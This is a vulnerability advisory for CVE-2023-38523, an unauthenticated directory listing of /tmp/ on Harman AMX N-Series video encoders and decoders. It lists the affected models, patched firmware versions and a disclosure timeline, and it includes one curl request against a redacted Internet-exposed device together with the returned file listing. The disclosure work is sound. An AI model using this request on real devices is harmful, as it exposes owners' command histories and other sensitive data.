2 minute read

CVE-2023-38523

Summary

The web interface for multiple Harman AMX N-Series devices are vulnerable to directory listing on the /tmp/ directory, without authentication.

Models Impacted

N-Series N1115 Wallplate Video Encoder
N-Series N1x22A Video Encoder/Decoder
N-Series N1x33A Video Encoder/Decoder
N-Series N1x33 Video Encoder/Decoder
N-Series N2x35 Video Encoder/Decoder
N-Series N2x35A Video Encoder/Decoder
N-Series N2xx2 Video Encoder/Decoder
N-Series N2xx2A Video Encoder/Decoder
N-Series N3000 Video Encoder/Decoder
N-Series N4321 Audio Transceiver

Vulnerability Details

The /tmp/ directory can be accessed on the AMX N-Series 2000/3000 Encoders without authentication. The files included in this directory include sensitive data such as the command history and screenshot of the file being processed.

As an example, the following is redacted snippet from an encoder that is currently exposed to the Internet :

$ curl http://[REDACTED]/tmp/ -i 
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Content-Length: 1848
Date: Fri, 07 Jun 2013 03:10:44 GMT
Server: lighttpd/1.4.28

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Index of /tmp/</title>
<style type="text/css">
a, a:active {text-decoration: none; color: blue;}
a:visited {color: #48468F;}
a:hover, a:focus {text-decoration: underline; color: red;}
body {background-color: #F5F5F5;}
h2 {margin-bottom: 12px;}
table {margin-left: 12px;}
th, td { font: 90% monospace; text-align: left;}
th { font-weight: bold; padding-right: 14px; padding-bottom: 3px;}
td {padding-right: 14px;}
td.s, th.s {text-align: right;}
div.list { background-color: white; border-top: 1px solid #646464; border-bottom: 1px solid #646464; padding-top: 10px; padding-bottom: 14px;}
div.foot { font: 90% monospace; color: #787878; padding-top: 4px;}
</style>
</head>
<body>
<h2>Index of /tmp/</h2>
<div class="list">
<table summary="Directory Listing" cellpadding="0" cellspacing="0">
<thead><tr><th class="n">Name</th><th class="m">Last Modified</th><th class="s">Size</th><th class="t">Type</th></tr></thead>
<tbody>
<tr><td class="n"><a href="../">Parent Directory</a>/</td><td class="m">&nbsp;</td><td class="s">- &nbsp;</td><td class="t">Directory</td></tr>
<tr><td class="n"><a href="cmdHistory.txt">cmdHistory.txt</a></td><td class="m">2013-Mar-24 11:49:25</td><td class="s">14.4K</td><td class="t">text/plain</td></tr>
<tr><td class="n"><a href="edidDecoder.txt">edidDecoder.txt</a></td><td class="m">2013-Jan-25 05:13:57</td><td class="s">3.2K</td><td class="t">text/plain</td></tr>
<tr><td class="n"><a href="switch.xml">switch.xml</a></td><td class="m">2012-Aug-08 08:08:26</td><td class="s">13.7K</td><td class="t">application/xml</td></tr>
</tbody>
</table>
</div>
<div class="foot">lighttpd/1.4.28</div>
</body>
</html>

An example of a vulnerable host : Screenshot from 2023-07-20 11-52-55

The following updates and hotfixes were released to help remediate the issue : https://help.harmanpro.com/n1115-svsi-firmware
https://help.harmanpro.com/n1x22a-updater
https://help.harmanpro.com/n1x33a-updater
https://help.harmanpro.com/n1x33-updater
https://help.harmanpro.com/n2x35-updater-hotfix
https://help.harmanpro.com/n2x35a-updater-hotfix
https://help.harmanpro.com/n2xx2-updater-hotfix
https://help.harmanpro.com/n2xx2a-updater
https://help.harmanpro.com/svsi-n4321-firmware
https://help.harmanpro.com/n3k-updater-hotfix

Patched Versions

N-Series N1115 Wallplate Video Encoder v1.15.61
N-Series N1x22A Video Encoder/Decoder v1.15.61
N-Series N1x33A Video Encoder/Decoder v1.15.61
N-Series N1x33 Video Encoder/Decoder v1.15.61
N-Series N2x35 Video Encoder/Decoder v1.15.61
N-Series N2x35A Video Encoder/Decoder v1.15.61
N-Series N2xx2 Video Encoder/Decoder v1.15.61
N-Series N2xx2A Video Encoder/Decoder v1.15.61
N-Series N3000 Video Encoder/Decoder v2.12.105
N-Series N4321 Audio Transceiver v1.00.06

Disclosure Timeline

Dec 12,2022 Two attempts made to reach out to Harman on their Product Security web form.
Dec 22, 2022 Email sent to security@samsung.com.
Jan 8, 2023 Email sent to privacy@harman.com and security@harman.com.
Jan 8, 2023 Response from Privacy@harman.com to reach out to cybersecurity@harman.com for reporting vulnerabilities.
Jan 8, 2023 Emailed cybersecurity@harman.com to confirm right channel to report the vulnerability.
Jan 10, 2023 Provided Harman with a detailed report of the Vulnerability.
Jan 11, 2023 Report acknowledged by Harman Cybersecurity.
Mar 3, 2023 Checked in with Harman Cybersecurity.
Mar 6, 2023 Harman Cybersecurity confirmed that patches have already been published and the issue can be publicly disclosed.
Mar 8, 2023 CVE requested from MITRE (First Attempt).
Apr 27, 2023 MITRE referred to Samsung Mobile as CNA.
May 12, 2023 CVE requested from Samsung Mobile (CNA).
May 15, 2023 Samsung Mobile states issue is out of scope for their CNA.
May 15, 2023 CVE requested from MITRE (Second Attempt). Request was marked as Closed without a response.
Jun 28, 2023 CVE requested from MITRE (Third attempt).
Jul 19,2023 CVE number assigned by MITRE.

Special Thanks to the Cybersecurity team at Harman for their prompt responses (after the initial hiccup in reaching them) and their detailed communication on steps taken to remediate the vulnerability.

Tags:

Categories:

Updated: